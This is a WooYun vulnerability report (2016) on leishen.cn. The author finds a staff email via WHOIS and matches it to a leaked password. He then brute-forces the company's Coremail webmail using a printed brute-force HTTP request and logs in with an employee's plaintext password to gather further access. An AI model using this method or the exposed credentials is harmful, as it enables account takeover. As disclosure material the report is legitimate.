当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0167557

漏洞标题:雷神某处敏感信息泄露

相关厂商:leishen.cn

漏洞作者: N0Hacker

提交时间:2016-01-06 10:43

修复时间:2016-02-22 21:46

公开时间:2016-02-22 21:46

漏洞类型:网络敏感信息泄漏

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-01-06: 细节已通知厂商并且等待厂商处理中
2016-01-09: 厂商已经确认,细节仅向厂商公开
2016-01-19: 细节向核心白帽子及相关领域专家公开
2016-01-29: 细节向普通白帽子公开
2016-02-08: 细节向实习白帽子公开
2016-02-22: 细节向公众公开

简要描述:

敏感信息泄露- -账户安全控制不严 危害较大 涉及到雷神各类网站权限

详细说明:

leishen.cn
网站whios查询

-1.png


得到QQ邮箱
查询信息 查询泄露:
[email protected] 常用密码
mail.trzone.cn
coremail
有缺陷 可爆破

POST /coremail/index.jsp HTTP/1.1
Host: c2.icoremail.net
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://mail.trzone.cn/
Cookie: route=0122de15e6dbc9014a05b7e42a82ff02; analytics_login_time=1450668694717; locale=zh_CN; route=3d1806e765853e11cec04b8bffc7fb36
X-Forwarded-For: 8.8.8.8
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 151
webmailIndexUrl=&uid=§admin§&nodetect=&domain=trzone.cn&password=§111111§&verifycookie=1&forceCookieCheck=1&webprefix=%40login&locale=zh_CN&action%3Alogin=

啊啊啊.png


尝试登陆:
mail.trzone.cn
何啸川 <[email protected]> a2430036

0.png


登录成功
然后邮箱内 各种查 各种找 各种猜
得到各种权限
下面如图(部分)

1.png

2.png

3.png

4.png

5.png

6.png

8.png

9.png

10.png" <img src="/upload/201601/05182044192825a10175ac2c4d69b4f0b7c8a2e7.png" alt="11.png

12.png

13.png

14.png

漏洞证明:

详细说明

修复方案:

你懂的 - -

版权声明:转载请注明来源 N0Hacker@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2016-01-09 16:55

厂商回复:

感谢对雷神科技的支持

最新状态:

暂无